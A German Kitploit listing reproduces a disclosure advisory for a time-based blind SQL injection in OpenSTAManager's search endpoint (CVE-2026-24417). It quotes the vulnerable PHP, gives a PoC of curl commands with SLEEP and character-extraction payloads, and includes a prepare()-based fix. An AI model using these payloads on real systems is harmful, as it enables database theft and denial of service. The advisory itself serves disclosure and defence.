Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24417 — CVE-2026-24417 - OpenSTAManager weist eine zeitbasierte Blind-SQL-Injection mit verstärktem Denial-of-Service auf. | Kitploit
Tools/GitHubGitHub/lukasz-rybak/cve-2026-24417
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungDatenbanksicherheit
GitHublukasz-rybak/cve-2026-24417

CVE-2026-24417

CVE-2026-24417 - OpenSTAManager weist eine zeitbasierte Blind-SQL-Injection mit verstärktem Denial-of-Service auf.

Repository anzeigen
4vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24417: OpenSTAManager weist eine zeitbasierte Blind-SQL-Injection mit verstärktem Denial-of-Service auf

Übersicht

FeldDetails
CVE-IDCVE-2026-24417
SchweregradHOCH
SicherheitshinweisSicherheitshinweis ansehen
Entdeckt vonLukasz Rybak

Betroffene Produkte

  • devcode-it/openstamanager (Versionen: < 2.9.8)

CWE-Klassifizierung

  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Details

Zusammenfassung

Eine kritische, zeitbasierte Blind-SQL-Injection-Schwachstelle, die mehrere Suchmodule in OpenSTAManager v2.9.8 betrifft, ermöglicht es authentifizierten Angreifern, vertrauliche Datenbankinhalte – darunter Passwort-Hashes, Kundendaten und Finanzunterlagen – mithilfe zeitbasierter Boolescher Inferenzangriffe mit verstärkter Ausführung über 10+ Module hinweg zu extrahieren.

Status: ✅ Bestätigt und an einer Live-Instanz getestet (v2.9.8) Angreifbarer Parameter: term (GET) Betroffener Endpunkt: /ajax_search.php Betroffene Module: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 enthält eine kritische, zeitbasierte Blind-SQL-Injection-Schwachstelle in der globalen Suchfunktion. Die Anwendung bereinigt den Parameter term nicht ordnungsgemäß, bevor er in SQL-LIKE-Klauseln mehrerer modulspezifischer Such-Handler verwendet wird. Dadurch können Angreifer beliebige SQL-Befehle einschleusen und über zeitbasierte Boolesche Inferenz vertrauliche Daten extrahieren.

Angriffskette:

  1. Einstiegspunkt: /ajax_search.php (Zeile 30-31)

    root@kitploit:~
    $term = get('term');
    $term = str_replace('/', '\\/', $term);
    

    Der Parameter $term wird nur minimal bereinigt (lediglich Ersetzung von Schrägstrichen).

  2. Verteilung: /src/AJAX.php::search() (Zeile 159-161)

    root@kitploit:~
    $files = self::find('ajax/search.php');
    array_unshift($files, base_dir().'/ajax_search.php');
    foreach ($files as $file) {
        $module_results = self::getSearchResults($file, $term);
    

    Der nicht bereinigte $term wird an alle modulspezifischen Such-Handler übergeben.

  3. Ausführung: /src/AJAX.php::getSearchResults() (Zeile 373)

    root@kitploit:~
    require $file;
    

    Die search.php-Datei jedes Moduls wird eingebunden, wobei die Variable $term im Gültigkeitsbereich liegt.

  4. Angreifbare SQL-Abfragen: Mehrere Module verketten $term direkt, ohne prepare() zu verwenden

Alle betroffenen Dateien (10+ angreifbare Instanzen):

  1. /modules/articoli/ajax/search.php - Zeile 51 (PRIMÄRES BEISPIEL)

    root@kitploit:~
    foreach ($fields as $name => $value) {
        $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    }
    $rs = $dbo->fetchArray($query);
    

    Auswirkung: Direkte Verkettung ohne prepare() ermöglicht vollständige SQL-Injection.

  2. /modules/ordini/ajax/search.php - Zeilen 43, 47

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
    
  3. /modules/ddt/ajax/search.php - Zeilen 43, 47

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  4. /modules/fatture/ajax/search.php - Zeilen 45, 49

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  5. /modules/preventivi/ajax/search.php - Zeilen 45, 49

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  6. /modules/anagrafiche/ajax/search.php - Zeilen 62, 107, 162

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  7. /modules/impianti/ajax/search.php - Zeile 46

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    

Korrekt bereinigt (NICHT angreifbar):

  • /modules/contratti/ajax/search.php - Verwendet prepare() korrekt
  • /modules/automezzi/ajax/search.php - Verwendet prepare() korrekt

Hinweis: Die Schwachstelle weist eine verstärkte Ausführung auf – eine einzelne schädliche Anfrage löst SQL-Injection in ALLEN angreifbaren Modulen gleichzeitig aus. Dadurch werden zeitbasierte Angriffe pro Anfrage 10+ Mal ausgeführt, was die Verzögerung vervielfacht und – wie auf der Live-Demo-Instanz beobachtet – zu 504 Gateway Time-out-Fehlern führt.

Bild

PoC

Schritt 1: Anmeldung

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Schritt 2: Schwachstelle verifizieren (zeitbasiertes SLEEP)

root@kitploit:~
# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s
Bild

Schritt 3: Datenextraktion - Datenbankname

root@kitploit:~
# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s
Bild

Auswirkung

Betroffene Benutzer: Alle authentifizierten Benutzer mit Zugriff auf die globale Suchfunktion.

  • Vollständige Exfiltration der Datenbank, einschließlich personenbezogener Kundendaten (PII), Finanzunterlagen und Geschäftsgeheimnisse
  • Extraktion von Passwort-Hashes für Offline-Cracking
  • Verstärkte zeitbasierte Angriffe verbrauchen pro Anfrage 85x Serverressourcen

Empfohlene Korrektur:

Ersetzen Sie alle Vorkommen der direkten $term-Verkettung durch prepare():

VORHER (Angreifbar):

root@kitploit:~
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

NACHHER (Behoben):

root@kitploit:~
$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Wenden Sie diese Korrektur auf ALLE betroffenen Dateien an:

  1. /modules/articoli/ajax/search.php - Zeile 51
  2. /modules/ordini/ajax/search.php - Zeilen 43, 47, 79
  3. /modules/ddt/ajax/search.php - Zeilen 43, 47, 83
  4. /modules/fatture/ajax/search.php - Zeilen 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Zeilen 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Zeilen 62, 107, 162
  7. /modules/impianti/ajax/search.php - Zeile 46

Referenzen

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24417
  • https://github.com/advisories/GHSA-4hc4-8599-xh2h

Haftungsausschluss

Die Offenlegung dieser CVE erfolgte verantwortungsvoll und im Einklang mit den Praktiken der koordinierten Offenlegung von Schwachstellen. Die hier bereitgestellten Informationen dienen ausschließlich Bildungs- und Verteidigungszwecken.

Tool herunterladen